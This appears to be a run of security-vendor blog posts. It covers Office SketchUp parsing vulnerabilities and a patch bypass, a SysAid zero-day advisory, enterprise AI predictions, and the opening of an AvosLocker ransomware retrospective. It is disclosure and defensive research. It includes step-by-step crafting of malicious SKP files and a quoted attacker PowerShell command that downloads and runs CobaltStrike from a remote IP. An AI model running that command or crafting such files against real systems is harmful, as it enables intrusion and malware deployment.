fixed these vulnerabilities by disabling support for SKP files with the MFC type, rather than fixing the underlying issues within the FreeImage library. As a result, this patch is incomplete, because these vulnerabilities in the FreeImage library could still be triggered using SKP files with the VFF type. Next, let’s take a look at the process of bypassing the patch for CVE-2023-29344. The figure below shows a Proof-of-Concept (PoC) crafting template for an SKP file with the VFF type, which includes a SketchUp header, a VFF header, and an embedded zip file. All data related to SketchUp 3D models are stored within a zip file. Figure 3: A PoC crafting template for SKP file with the VFF type We extract the part of the zip file within an SKP file and then analyze it using the zip template in 010 Editor. The result of the parsing operation reveals an image stored within the materials folder. Figure 4: Analyzing the zip file embedded in the SKP file using the ZIP template in 010 Editor Craft a new PoC. Compress the abnormal image file using the Deflate algorithm. zlib.compressobj(compresslevel, zlib.DEFLATED, -zlib.MAX_WBITS, zlib.DEF_MEM_LEVEL, 0).compress(data) Calculate the new CRC32 for the uncompressed image data. We can use 010 Editor’s CRC32 tool or Windows built-in CRC utility. Update the fields frCrc, frCompressSize, frUncompressSize, and frData (compressed image data) Update the field deHeaderOffset for each dirEntry, and also update the fields deCrc, deCompressSize, and deUncompress in struct ZIPDIRENTRY dirEntry[4] materials/_1/E70785.tif. Update the field erDirectoryOffset in the struct ZIPENDLOCATOR endLocator Combine the SketchUp header, VFF header, and the modified zip file into a complete SKP file. Finally, we need to re-calculate the checksum in the VFF header. We uncovered a specific algorithm responsible for computing this checksum. Figure 6 shows a pseudo-code representation of this algorithm. Figure 5: The parsing result in 010 Editor Figure 6: The specific algorithm responsible for computing this checksum in a VFF header So far, we’ve elaborated on the steps of crafting the new PoC to bypass the patch for CVE-2023-29344. With this approach, we reproduced 97 unique vulnerabilities in Microsoft 365 apps updating to the patch of CVE-2023-29344. Microsoft assigned CVE-2023-33146 for this discovery which bypassed the original patch. Finally, Microsoft disabled the ability to insert SketchUp files in Office documents in the patch for CVE-2023-33146. A screenshot of the Microsoft update Real-World Cases Microsoft Office SKP file parsing `CVertex` object use-after-free vulnerability The figure below shows a use-after-free vulnerability that is associated with the parsing of an abnormal SKP file in Microsoft Office. Figure 7: Microsoft Office SKP File Parsing `CVertex` object Use-After-Free Vulnerability Microsoft Office SKP file parsing TIFF image integer overflow vulnerability The figure below shows an integer overflow vulnerability that is associated with the parsing of an SKP file containing an abnormal TIFF image in Microsoft Office. This vulnerability ultimately results in a crash within the memcpy function. Figure 8: Microsoft Office SKP File Parsing TIFF Image Integer Overflow Vulnerability Microsoft Office SKP file parsing uninitialized memory vulnerability The figure below shows an uninitialized memory vulnerability that is associated with the parsing of an abnormal SKP file in Microsoft Office. This vulnerability potentially results in remote code execution. Figure 9: Microsoft Office SKP File Parsing Uninitialized Memory Vulnerability Microsoft Office SKP File parsing BMP image out-of-bounds write vulnerability The figure below shows an out-of-bounds write vulnerability that is associated with the parsing of an SKP file containing an abnormal BMP image in Microsoft Office. Figure 10: Microsoft Office SKP File Parsing BMP Image Out-of-Bounds Write Vulnerability Microsoft Office SKP File parsing PICT image out-of-bounds write vulnerability The figure below shows an out-of-bounds write vulnerability (CVE-2023-29344) that is associated with the parsing of an SKP file containing an abnormal PICT image in Microsoft Office. The PoC file for this vulnerability is an SKP file with the MFC type. Figure 11: Microsoft Office SKP File Parsing PICT Image Out-of-Bounds Write Vulnerability (PoC with MFC type) In Figure 12, we observe the bypass of CVE-2023-29344 using an SKP file with the VFF type. Figure 12: Microsoft Office SKP File Parsing PICT Image Out-of-Bounds Write Vulnerability (PoC with VFF type) Conclusion In this two part series, we’ve walked you through the process of reverse engineering the Office 3D component, and we’ve also explored how to create two effective fuzzing harnesses, one for SketchUp and the other for FreeImage. The results have been highly effective. We discovered 117 unique vulnerabilities within the Office 3D component in Microsoft 365 apps in approximately three months. These security vulnerabilities demonstrate the importance of performing security code audits and blackbox fuzzing for third-party libraries before they are introduced into a new or existing product. Mitigation All users of Microsoft 365 apps are encouraged to upgrade to the latest version of the software. Zscaler’s Advanced Threat Protection and Advanced Cloud Sandbox can protect customers against these vulnerabilities as follows: Win64.Exploit.CVE-2023-28285 Win64.Exploit.CVE-2023-29344 Win64.Exploit.CVE-2023-33146 Appendix The following vulnerabilities were discovered and reported by ThreatLabz while fuzzing the SketchUp library in Microsoft 365 applications. References Tue, 21 nov 2023 08:03:04 -0800 Kai Lu Coverage Advisory for CVE-2023-47246 SysAid Zero-Day Vulnerability Introduction On November 8 2023, SysAid published an advisory for CVE-2023-47246 regarding a critical zero-day vulnerability on their SysAid On-Premise software. SysAid describes the vulnerability as a path traversal vulnerability leading to code execution for the same software. This blog includes immediate recommendations for SysAid On-Premise software customers, best practices for long-term protection against these kinds of vulnerabilities, and a brief analysis of the attack chain. Recommendations SysAid recommends customers using On-Premise software to do both of the following: Upgrade to version 23.3.6 Perform a full system and network assessment to detect potential compromise If any indicators of compromise (IoCs) are found, Zscaler recommends SysAid On-Premise customers follow the incident response protocol and take immediate action. In addition, Zscaler strongly recommends upgrading to the latest versions. More information on the upgrade is available here and here. Attribution Lace Tempest (DEV-0950 / TA-505) are the threat actors believed to be responsible for exploiting this vulnerability. This same group is responsible for exploiting the MoveIT Transfer vulnerability earlier this year, and is associated with a ransomware group known as "CL0P". Attack Chain Figure 1: An attack chain depicting a threat actors exploiting the CVE-2023-47246 vulnerability to infiltrate the SysAid system Possible ExecutionHow it worksThe threat actors successfully uploaded a WAR archive that housed a WebShell and various payloads into the webroot of the SysAid Tomcat web service by exploiting the SysAid CVE-2023-47246 Path Traversal vulnerability. The vulnerability is located in the doPost method of the SysAid com.ilient.server.UserEntry class. Exploiting this vulnerability involves manipulating the accountID parameter to introduce a path traversal, allowing the attacker to determine the location on the vulnerable server where the WebShell is written. The attack is executed by delivering a POST request with a zipped, compressed WAR file containing the WebShell as the request body. Subsequently, the threat actor gains access to the WebShell, enabling them to interact with the compromised system.PowerShell used to execute GraceWireThe threat actor leveraged unauthorized access to deploy a PowerShell script to execute the GraceWire loader on the victim’s machine. The PowerShell script (pictured below) enumerates all the files listed in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory and then checks for antivirus or anti-malware processes beginning with “Sophos”. If the script detects adversarial software running on the victim’s system, then it exits to avoid detection.If the script doesn’t detect antivirus or anti-malware software, then it executes the GraceWire loader (user.exe) on the victim’s machine.Figure 2: The PowerShell script used to launch the GraceWire loader (user.exe)GraceWire Loader AnalysisThe GraceWire loader follows a sequence of steps. First, it checks for the existence of a file named <filename>.bin, which contains an encrypted payload. If this file is present in the current directory, the loader proceeds to read its contents using the ReadFile() function, storing the data in the allocated memory. Subsequently, it decrypts the encrypted information and calculates checksums. If the checksum is verified as correct, the program executes the decrypted bin payload. This payload is designed to deploy the GraceWire trojan. Additionally, the loader injects the GraceWire Trojan into various processes, including:spoolsv.exemsiexec.exesvchost.exeWhen examining the code, we also discovered debug print statements showcasing the control flow of the GraceWire loader.Figure 3: A screenshot of debug print statements showcasing the control flow of the GraceWire loaderGetting rid of evidenceThreat actors employ another PowerShell script to systematically eliminate traces and evidence linked to their malicious activities once they have infiltrated the victim’s system. This post-exploitation tactic is aimed at erasing digital footprints and minimizing the likelihood of detection by removing indicators of compromise (IoCs).Possible other exploitsMicrosoft posted a tweet highlighting the exploitation of this vulnerability in CL0P ransomware and strongly recommends system updates. In addition, SysAid found supporting evidence indicating the utilization of the following PowerShell command to download and execute CobaltStrike.powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http[:]//179[.]60[.]150[.]34:80/a')Best Practices Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access, especially with application security modules turned on. Route all server traffic through Zscaler Private Access with additional application security module enabled and Zscaler Internet Access, which will provide the right visibility to identify and stop malicious activity from compromised systems/servers. Turn on Zscaler Advanced Threat Protection to block all known command-and-control domains. This will provide additional protection in case the adversary exploits this vulnerability to implant malware. Extend command-and-control protection to all ports and protocols with the Zscaler Cloud Firewall (Cloud IPS module), including emerging C2 destinations. Again, this will provide additional protection in case if the adversary exploits this vulnerability to implant malware. Use Zscaler Cloud Sandbox to prevent unknown malware delivered as part of a second stage payload. Ensure you are inspecting all SSL traffic. Restrict traffic to the critical infrastructure from the allowed list of known-good destinations. Zscaler Coverage The Zscaler ThreatLabZ team has deployed protection. Zscaler Advanced Threat Protection: App.Exploit.CVE-2023-47246 Zscaler Private Access AppProtection: Local File Inclusion : 930110 (Path Traversal Attack (/../) - Decoded Payloads) Details related to these signatures can be found in the Zscaler Threat Library. Apache.Exploit.CVE-2021-44228 Win32.Ransom.Clop Win32.Trojan.GraceWire Indicators of Compromise (IoCs) For a list of IoCs, please visit the indicators section of SysAid On-Prem Software CVE-2023-47246 Vulnerability. *This article will be updated as information becomes available or if additional protection is put in place by Zscaler. Wed, 15 nov 2023 07:56:09 -0800 Nishant Gupta Generative AI: 5 Enterprise Predictions for AI and Security — for 2023, 2024, and Beyond Trends/Predictions Enterprise use of AI tools will only grow, with industries like manufacturing leading the charge Enterprises will secure AI/ML applications to stay ahead of risk Enterprises will seek visibility and intelligent access controls around AI and ML applications AI will become a key component of enterprise data protection AI will transform how enterprises understand risk and security from the top down We’ve entered the era of widespread adoption for generative AI tools. From IT, to finance, marketing, engineering, and more, AI advances are causing enterprises to re-evaluate their traditional approaches to unlock the transformative potential of AI. Our recent data analysis of AI/ML trends and usage confirms this: enterprises across industries have substantially increased their use of generative AI, across many kinds of AI tools. What can enterprises learn from these trends, and what future enterprise developments can we expect around generative AI? Between our research and dozens of conversations with customers and partners, there are a number of trends that we can expect to see this year, in 2024, and onward. Enterprise use of AI tools will only grow, with industries like manufacturing leading the charge Our research shows that, mirroring the broader AI trend, enterprises across industry verticals sharply increased their use of AI from May 2023 to June 2023, with sustained growth through August 2023. We see that the majority of AI/ML traffic is being driven by manufacturing, which may offer a glimpse into the rapid innovation and transformation driven by Industry 4.0. Indeed, its substantial engagement in these tools highlights the likely key role that AI and ML will play in the future of manufacturing. Figure 1: Breakdown of AI popularity by industry vertical Other industries, like finance, have shown steep growth in the use of AI/ML tools, largely driven by the adoption of generative AI chat tools like ChatGPT and Drift. Indeed, since June 2023, the finance sector has experienced continuous growth in these areas. Figure 2: ChatGPT transaction trends by industry vertical Unsurprisingly, has emerged as a driving force, accounting for 36% of the AI/ML traffic we observed. Of that 36% observed, 58% of traffic to that domain can be attributed to ChatGPT. However, when it comes to the most popular tool in use, Drift takes the crown, followed by ChatGPT and tools like LivePerson and Writer. As new AI use cases continue to emerge, it is likely that we will see enterprises adopt AI — not merely in leveraging generative AI chat tools, but as a core driver of business that can create competitive differentiation. Figure 3: Pie chart of top AI applications Enterprises will work to secure AI/ML applications to stay ahead of risk Our research also found that as enterprises adopt AI/ML tools, subsequent transactions undergo significant scrutiny. Overall, 10% of AI/ML-related transactions are blocked across the Zscaler cloud using URL filtering policies. Here, the technology and finance industries are leading the charge, accounting for more than half of blocked transactions. Interestingly, Drift holds the distinction of being the most blocked, as well as most used, AI application. In all likelihood, we will see other industries take their lead to ensure that enterprises can minimize the risks associated with AI and ML tools. Figure 4: Blocked transactions by industry vertical The risks of leveraging AI and ML tools As we discussed in a recent blog, the risks of using generative AI tools in the enterprises are significant. In general, they fall into two buckets: 1. The release of intellectual property and non-public information Generative AI tools can make it easy for well-meaning users to leak sensitive and confidential data. Once shared, this data can be fed into the data lakes used to train large language models (LLMs), and can be discovered by other users. For example, a backend developer who queries ChatGPT, “Can you take this [my source code for a new product] and optimize it?” Or, a sales team member inputs the prompt, “Can you create sales trends based on the following Q2 pipeline data?” In both cases, sensitive information or protected IP may have leaked outside the organization. 2. The data privacy and security risks of AI applications themselves Not all AI applications are created equal. Terms and conditions can vary widely among the hundreds of AI/ML applications in popular use. Will your queries be used to further train an LLM? Will your data be mined for advertising purposes? Will it be sold to third parties? These are questions enterprises must answer. Similarly, the security posture of these applications can also vary, both in terms of how data is secured and the overall security posture of the company. Enterprises must be able to account for each of these factors, assigning risk scores among hundreds of AI/ML applications, to secure their use. Enterprises will seek visibility and intelligent access controls around AI and ML applications As a corollary to this last trend, it’s likely that enterprises will continue to seek precise controls for their AI/ML applications. For many enterprises, visibility will be the starting point of creating an AI security policy, followed by the adoption of intelligent, granular access controls to ensure that users can embrace these tools in an approved, secure fashion. There are a number of key questions that enterprises will want to answer, including: Do I have deep visibility into employee AI app usage? Enterprises will seek complete visibility into the AI/ML tools in use. In addition, they will monitor corporate traffic and transactions to these applications. Can I allow access to only certain AI apps? Enterprises will want to allow granular access to approved AI applications at the department, team, and user levels. Moreover, they will want to use URL filtering to broadly block access to unsafe or unwanted AI/ML tools. In addition, enterprises may consider the ability to allow ‘cautioned’ access—where users may use a specific tool, but they are coached around the risks and limitations of using it. Which AI applications protect private data? Enterprise must understand the security posture of the AI apps that employees are using, among the hundreds of AI tools in everyday use. In order to appropriately configure access policies, enterprises must understand which of these applications will protect their data and assess the security of the organizations creating/managing these applications. Can I prevent data from leaving the organization? Preventing data loss will be a key factor in embracing generative AI. Enterprises will likely gravitate to data loss prevention (DLP) technologies that allow them to create policies preventing the leakage of sensitive data like source code, structured data like credit card information, and PII. In a more sophisticated fashion, it will also become more common for enterprises to block risky user actions when using generative AI tools that are key contributors to data loss — like copy & paste, and uploads and downloads. AI and ML will become a key component of enterprise data protection As enterprises recognize the need to prevent data loss across their footprint, it is likely that they will increasingly leverage AI as a means of identifying and protecting their data. In conversations with customers about preventing data leakage, one challenge that frequently surfaces is that enterprises often lack visibility into all the places where their critical data lives, and are thus unable to classify and protect it using technologies like DLP. DLP remains an attractive option in the context of generative AI — we have a video here showing how DLP blocks source code from being entered into ChatGPT, for instance. However, lacking a complete understanding of their data, enterprises can find it challenging to create policies that prevent leakage when using these tools. As a result, we anticipate that enterprises will increasingly leverage AI as a way to gain data visibility and improve their data hygiene. Using ML, for instance, it is now possible to discover and classify sensitive data automatically, such as financial and legal documents, PII and medical data, and much more. From there, enterprises will take the next step and use these ML-driven data categories as the basis of DLP policy — thus preventing data loss when using tools like ChatGPT. AI will transform how enterprises understand risk and security from the top down We’ve talked about how enterprises are adopting generative AI tools to transform business. Broadening out, it’s also possible to anticipate the ways AI will become a core business function, specifically from the perspective of risk and security. While enterprises currently leverage AI to unleash new potential and insights across IT, technology, marketing, customer experience, and more, they will increasingly look to AI and ML to transform how they view risk. Here are three key roles that AI will increasingly play for security: Provide a comprehensive view of risk. In conversations with customers, we hear that enterprises commonly have limited visibility and fragmented or delayed data around enterprise risk. In much the same way that AI can help discover and classify data, we predict enterprises will use AI to visualize and quantify risk across their entire footprint. This includes gaining comprehensive insights and risk scoring across their attack surface and across their business entities —including their workforce, applications, assets, and third parties. Deliver top-down visualization and reporting. Similarly, enterprises will leverage AI to gain top-down and board-level visualizations of their risk — a critical but rarely-achieved goal. Enterprises will use these insights to uncover and drill down into their top contributing factors to risk, including the ability to quantify the financial impact of exposures. Drive prioritized remediation. Finally, enterprises will seek AI tools that allow them to automatically gain prioritized security actions and policy recommendations, which are tied to their key risk drivers and which quantifiably improve the security of their organization. Want to learn more about how enterprises can better embrace AI and solve its risks? Tune in to our webinar, AI vs. AI: Harnessing AI Defenses Against AI-Powered Risks. Thu, 09 nov 2023 10:13:40 -0800 Will Seaton ThreatLabz Discovers 117 Vulnerabilities in Microsoft 365 Apps Via the SketchUp 3D Library - Part 1 Introduction Microsoft launched support for SketchUp (SKP) files in June 2022 and in doing so, unknowingly introduced numerous vulnerabilities to Microsoft 365 applications. Within approximately three months, our research efforts unveiled 117 unique vulnerabilities. Microsoft assigned CVE-2023-28285, CVE-2023-29344, and CVE-2023-33146 to catalog these vulnerabilities. Consequently, Microsoft took the precautionary step of temporarily disabling SketchUp support in Microsoft 365 in June 2023. In this blog post, we will share the methodologies used to uncover these vulnerabilities and provide technical details for some of the vulnerabilities. This is Part 1 of our two-part series. The second part will be available soon. Key Takeaways The ThreatLabz research team discovered 117 vulnerabilities in Microsoft 365 applications, which were introduced when the SKP file format was added. Microsoft assigned 3 CVEs to track these vulnerabilities: CVE-2023-28285, CVE-2023-29344, and CVE-2023-33146. Microsoft created a patch to address the vulnerabilities that ThreatLabz was able to bypass. Microsoft disabled support for the SketchUp file format in Office as a result. Background Towards the end of December 2022, Zero Day Initiative (ZDI) published 4 vulnerability advisories related to Microsoft Office SKP files. Those were the first observed SKP file parsing vulnerabilities in Microsoft Office. This discovery triggered our interest in the specific component responsible for parsing SKP files. Figure 1: 4 vulnerability advisories about Microsoft Office SKP files from ZDI Introduction to 3D Models in Microsoft 365 The Office 3D component is a feature within Microsoft 365 apps that facilitates the integration and manipulation of 3D content into various Office applications. This component empowers users to work with 3D models, making it especially valuable for tasks such as creating presentations, visualizing data, or enhancing the overall user experience. The list below represents the 7 supported 3D formats within Microsoft 365 apps. Binary GL Transmission Format *.glb Filmbox Format *.fbx Object Format *.obj 3D Manufacturing Format *.3mf Polygon Format *.ply StereoLithography Format *.stl SketchUp *.skp (New!) In 2022, the SketchUp file format was introduced as a new 3D file format to Microsoft 365 apps. It's important to note that various other 3D file formats have long-standing support within Microsoft 365 apps. As a general rule, the introduction of a new feature, such as the support of SketchUp files, may introduce security vulnerabilities. SKP File Format SKP is a proprietary file format developed by SketchUp Software for 3D modeling and design. An SKP file contains data and information necessary to create and render 3D models, including geometry, textures, materials, and more. The SKP format was originally developed in 2000 by @Last Software. Google acquired the SKP format in 2006, and then Trimble Navigation took ownership in 2012. The popularity of SketchUp has continued to grow and it was recently named the #1 architecture software program in the world (as shown in Figure 2), based on G2’s Grid® Report for Architecture, Spring 2023. Figure 2: G2’s Grid® Report for Architecture, Spring 2023 In June 2022, Microsoft officially announced the integration of SketchUp file support into their Office applications for both Windows and Mac platforms as shown in Figure 3. Figure 3: Add SketchUp files to Office creations SketchUp files are inserted into an Office document by selecting Insert → 3D Models and then choosing a SketchUp file as shown in Figure 4. Figure 4: Process to insert SKP files into an Office document Reverse Engineering the Office 3D Component Reverse engineering plays a critical role in uncovering and understanding software vulnerabilities, as it allows cybersecurity experts to dissect and analyze code — providing valuable insights into how potential weaknesses and security flaws can be exploited or mitigated. Office 3D Parsing The dynamic library MSOSPECTRE.DLL (shown in Figure 5) is responsible for parsing 3D file formats in Microsoft 365 apps. Our vulnerability research on the SketchUp file format was conducted in version 16.0.16026.20000, which was released in January 2023. Figure 5: MSOSPECTRE.DLL is responsible for parsing 3D file formats in Microsoft 365 apps During our analysis of MSOSPECTRE.DLL using IDA Pro, a series of functions with names prefixed with "SU" caught our attention, as depicted in Figure 6. It's worth noting that these functions are, in fact, SketchUp C APIs sourced from the SketchUp SDK. Figure 6: A bunch of functions with name prefixed with “SU” in IDA Pro By combining reverse engineering MSOSPECTRE.DLL with dynamic debugging, we determined the function Spectre::Transcoder::ImporterSKP::ImportToAsset3D is responsible for parsing an SKP file in Microsoft 365 apps. Figure 7 provides a code snippet of its pseudo code. Figure 7: The function Spectre::Transcoder::ImporterSKP::ImportToAsset3D This function calls a sequence of SketchUp APIs and certain wrapper functions that, in turn, invoke additional SketchUp APIs, as demonstrated below. SUInitialize SUModelCreateFromBufferWithStatus SUTextureWriterCreate SUModelGetRenderingOptions SUModelGetEntities Spectre::Transcoder::ImporterSKP::CountEntities Spectre::Transcoder::ImporterSKP::ExportEntities Now, we’ll examine the implementation for each of these wrapper functions. 1. Spectre::Transcoder::ImporterSKP::CountEntities (Shown in Figure 8) SUEntitiesGetNumGroups SUEntitiesGetGroups Spectre::Transcoder::SkpUtils::IsVisible Spectre::Transcoder::ImporterSKP::CountEntities SUEntitiesGetNumInstances SUEntitiesGetInstances Spectre::Transcoder::ImporterSKP::CountComponentInstance (Shown in Figure 9) SUEntitiesGetNumFaces Spectre::Transcoder::SkpUtils::GetRenderingOptionValue SUEntitiesGetNumEdges Figure 8: Spectre::Transcoder::ImporterSKP::CountEntities Figure 9: Spectre::Transcoder::ImporterSKP::CountComponentInstance 2. Spectre::Transcoder::ImporterSKP::ExportEntities (Shown in Figure 10) SUEntitiesGetNumGroups SUEntitiesGetGroups SUGroupToDrawingElement Spectre::Transcoder::ImporterSKP::ExportEntities SUEntitiesGetNumInstances SUEntitiesGetInstances Spectre::Transcoder::ImporterSKP::ExportComponentInstance SUEntitiesGetNumFaces SUEntitiesGetFaces Spectre::Transcoder::ImporterSKP::ExportFaces SUEntitiesGetNumEdges SUEntitiesGetEdges SUEdgeGetSoft SUEdgeGetStartVertex SUEdgeGetEndVertex SUVertexGetPosition Spectre::Transcoder::SkpUtils::ToVector3 Figure 10: Spectre::Transcoder::ImporterSKP::ExportEntities 3. Spectre::Transcoder::ImporterSKP::ExportComponentInstance (Shown in Figure 11) SUComponentInstanceGetDefinition SUGroupToDrawingElement SUComponentDefinitionGetEntities SUDrawingElementGetMaterial Spectre::Transcoder::ImporterSKP::ExportEntities Figure 11: Spectre::Transcoder::ImporterSKP::ExportComponentInstance 4. Spectre::Transcoder::ImporterSKP::ExportFaces (Shown in Figure 12) Spectre::Transcoder::SkpUtils::GetEffectiveMaterial Spectre::Transcoder::ImporterSKP::GetMaterial Spectre::Transcoder::ImporterSKP::AddFacesGeometry Figure 12: Spectre::Transcoder::ImporterSKP::ExportFaces 5. Spectre::Transcoder::ImporterSKP::GetMaterial (Shown in Figure 13) SUMaterialGetType SUMaterialGetUseOpacity SUTextureGetAverageColor_0 Spectre::Transcoder::SkpUtils::GetMaterialColor Spectre::Transcoder::SkpUtils::GetTextureId Spectre::Transcoder::ImporterSKP::GetTexture SUMaterialGetOpacity Figure 13: Spectre::Transcoder::ImporterSKP::GetMaterial 6. Spectre::Transcoder::SkpUtils::GetTextureId (Shown in Figure 14) SUTextureWriterLoadFace SUGroupToDrawingElement SUTextureWriterLoadEntity Figure 14: Spectre::Transcoder::SkpUtils::GetTextureId 7. Spectre::Transcoder::ImporterSKP::GetTexture (Shown in Figure 15) SUImageRepCreate SUTextureWriterGetImageRep SUImageRepConvertTo32BitsPerPixel SUImageRepGetDataSize SUImageRepGetPixelDimensions SUImageRepGetData SUImageRepRelease Figure 15: Spectre::Transcoder::ImporterSKP::GetTexture 8. Spectre::Transcoder::ImporterSKP::AddFacesGeometry (Shown in Figure 16) SUMeshHelperCreate SUMeshHelperGetNumVertices SUMeshHelperGetNumTriangles SUMeshHelperGetVertexIndices SUMeshHelperGetVertices SUMeshHelperGetNormals SUMeshHelperGetBackSTQCoords SUMeshHelperGetFrontSTQCoords SUMeshHelperRelease Figure 16: Spectre::Transcoder::ImporterSKP::AddFacesGeometry Throughout our reverse engineering process, we successfully analyzed all of the relevant functions involved in parsing SKP files within the Office 3D component. In particular, we discovered Microsoft leveraged a series of SketchUp C APIs to implement the functionality to parse an SKP file. SketchUp provides an SDK, including a C API. The online C API documentation contains reference material for all functions, data structures, and enumerations in both the SketchUp C API and the SketchUp Importer/Exporter interface. This was helpful to create and refine our SketchUp fuzzing harness. Numerous SketchUp APIs were used in the fuzzing harness. We will highlight some key functions below. void SUInitialize (): Initializes the slapi interface. Must be called before calling any other API functions. void SUTerminate (): Signals termination of the slapi interface. Must be called when done using API functions. enum SUResult SUModelCreateFromBufferWithStatus(SUModelRef *model, const unsigned char *buffer, size_t buffer_size, enum SUModelLoadStatus *status): Creates a model from a SketchUp skp file buffer. Figure 17: The function SUModelCreateFromBufferWithStatus The function SUModelCreateFromBufferWithStatus takes 4 parameters, where the 2nd and 3rd parameters are input parameters, and the 1st and 4th parameters are output parameters. Creating a harness for fuzzing Now, we’ll explore how to develop a harness for fuzzing the Office 3D component MSOSPECTRE.DLL. Figure 18 provides an overview of the source code of our SketchUp harness. Figure 18: An overview of the source code for our SketchUp harness In this code, we declared various SketchUp APIs and implemented several wrapper functions, which were derived from reverse engineering the Office 3D component. Figure 19 provides a code snippet for our SketchUp fuzzing harness. In the main function, the first step loads MSOSPECTRE.DLL using the LoadLibrary API, which returns the base address of MSOSPECTRE.DLL in memory. Then the function SUInitialize is called to initialize the SketchUp API functions. Once initialization occurs, the function fuzzme() is called. To ensure proper cleanup, the function SUTerminate is called. Figure 19: A code snippet of our SketchUp fuzzing harness The function fuzzme() implements the functionality found in the method Spectre::Transcoder::ImporterSKP::ImportToAsset3D in MSOSPECTRE.DLL as shown in Figure 20. Figure 20: The function fuzzme() in harness With our SketchUp harness complete, the next important step is setting up a fuzzer to effectively test it as follows: 1. Gather thousands of samples of SKP files from various websites. For example:[]=14​​​​​​ ​​​​2. To make the fuzzing process efficient, narrow down this collection to a smaller group of SKP files using Note: While integrating this harness into WinAFL, we encountered a timeout issue. This might have been due to the slightly longer time it takes to parse an SKP file within this harness. Despite the timeout challenge, we adopted a dumb file format fuzzer, which proved to be a workable solution. Ultimately, this approach led to impressive results, uncovering a total of 20 unique vulnerabilities illustrated in Figure 21 in just one month. These findings include various types of vulnerabilities such as use-after-free, heap buffer overflow, integer overflow, out-of-bounds write, type confusion, stack buffer overflow, etc. Figure 21: Vulnerabilities discovered by ThreatLabz through SketchUp harness SKP file format Through reverse engineering, we also uncovered that SKP files support two distinct data types: MFC type VFF type As shown in Figure 22, the function SketchUpModelReader::ReadModel is used to read data from an SKP file. If a VFF header is present in the SKP file, it calls SketchUpModelReaderVFF::ReadModel to handle VFF type data. Otherwise, it calls SketchUpModelReaderMFC::ReadModel to handle MFC type data. Figure 22: The function SketchUpModelReader::ReadModel in MSOSPECTRE.DLL We created a diagram in Figure 23 for the MFC data type structure thanks to our analysis of SketchUpModelReaderMFC::ReadModel. The structure starts with a SketchUp header, then a GUID, followed by a versionMap, and other specific data. Inside the versionMap and data sections, there are often bytes that start with FF FE FF, followed by a length field (1 byte), and then a Unicode string. After the Unicode string, there is specific data. Figure 23: The SKP file structure of MFC data type Next, we will explore the structure of an SKP file with the VFF data type. As illustrated in Figure 24, the structure starts with a SketchUp header, followed by a VFF header, and then a ZIP file. The VFF header contains 13 bytes of data, which includes the magic bytes ‘VFF’, followed by a length field indicating the length of the remaining VFF header, and then 4 bytes (currently unknown), and then a 4-byte checksum. Figure 24: The SKP file structure of the VFF data type Figure 25 shows a stack backtrace for a crash that indicates that the data type within the SKP file is the MFC type. Figure 25: The stack backtrace of an SKP PoC file with an MFC type The crash occurs during the parsing of a JPEG file embedded with the SKP file. What makes this finding particularly interesting is that another third-party library, FreeImage, is used to parse the image file embedded within an SKP file. When comparing a normal SKP file to the minimized SKP PoC file, only 1 byte is mutated within a JPEG image that’s part of the ‘materials’ structure in the SKP file (as shown in Figure 26). Figure 26: Comparison between a normal SKP file and the minimized SKP PoC file As shown in Figure 27, the function MSOSPECTRE!FreeImageUtils::CreateBmpFromMemory parses the image file embedded within an SKP file. Figure 27 illustrates its pseudo code that calls a series of FreeImage APIs. Figure 27: The function MSOSPECTRE!FreeImageUtils::CreateBmpFromMemory FreeImage is an open-source library designed for developers who want to provide support for various popular graphic image formats including PNG, BMP, JPEG, TIFF, WEBP, and more. FreeImage has the capability to handle 30 different types of image file formats, as illustrated in Figure 28. Interestingly, the last update to this library was made available in 2018. The extensive range of supported formats presents a significant attack surface for potential fuzzing efforts. Figure 28: FreeImage supports 30 image file formats We developed a harness named freeimage_harness.exe designed for fuzzing FreeImage by implementing the functionality of the function MSOSPECTRE!FreeImageUtils::CreateBmpFromMemory in MSOSPECTRE.DLL. Once we had the FreeImage harness ready, setting up a fuzzer was a straightforward task. We then took the following steps: Gather thousands of samples for the 30 different image file formats supported by the library. Minimize the collected samples for each image format using Seamlessly integrate the FreeImage harness into WinAFL. The result was very successful, discovering 97 unique vulnerabilities in just two months. Next, we will take a look at the process of reproducing these vulnerabilities within Microsoft 365 apps through a SketchUp file. We created a SketchUp template file based on the MFC data type as shown in Figure 29. Figure 29: A SketchUp template file with the MFC data type The following steps were performed: Obtain the size of the crafted image file (PoC file for FreeImage). Replace the image data in the SKP template file with the specially crafted image file. Revise the size field (4 bytes), which is situated just before the image data. Mitigation All users of Microsoft 365 Apps are encouraged to upgrade to the latest version of this software. Zscaler’s Advanced Threat Protection and Advanced Cloud Sandbox can protect customers against these vulnerabilities. Win64.Exploit.CVE-2023-28285 Win64.Exploit.CVE-2023-29344 Win64.Exploit.CVE-2023-33146 To Be ContinuedIn our journey through Part 1 of this series, we’ve explored how ThreatLabz reverse engineered 3D Models in Microsoft 365 and the SKP file format. In Part 2, we dive deeper into the vulnerabilities that we discovered and examine real-world case studies. Tue, 31 oct 2023 20:18:30 -0700 Kai Lu A Retrospective on AvosLocker Introduction On October 11, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) published an advisory for AvosLocker, which was a sophisticated double extortion Ransomware-as-a-Service (RaaS) group that was last observed being active in May 2023. Our research team put this report together so the security community can learn how to counteract other threats that employ similar tactics and procedures (TTPs). The AvosLocker group gained prominence in July 2021 and was known for employing a double extortion strategy where they first stole data before encrypting it. The group would then threaten to release the data on a dedicated leak site unless a ransom was paid. Initially, AvosLocker primarily targeted Windows systems, but they subsequently expanded their reach by creating a Linux version of their ransomware designed to target VMware ESXi. Key Takeaways AvosLocker was a Ransomware-as-a-Service double extortion group. No new activity has been observed since May 2023. AvosLocker hosted a data leak site from July 2021 to July 2023, where they would add stolen proprietary data unless a ransom was paid. AvosLocker heavily targeted the education sector – accounting for 25% of their attacks. The United States bore the brunt of most AvosLocker attacks accounting for a whopping 72.2%, with Canada trailing far behind at 9.3%. Attack Methodologies Since different affiliates employed distinct intrusion techniques, each threat actor’s deploying AvosLocker approach to gain unauthorized access varied significantly. Affiliates were observed exploiting ProxyShell vulnerabilities, like CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, present in the Microsoft Exchange server to obtain initial access. AvosLocker affiliates also infiltrated victims' networks via compromised RDP and VPN accounts, and exploited the Zoho ManageEngine ServiceDesk Plus vulnerability. After infiltrating a victim’s network, the ransomware was executed in Windows Safe Mode to maximize the number of files that could be encrypted, since applications such as databases and security software (e.g., 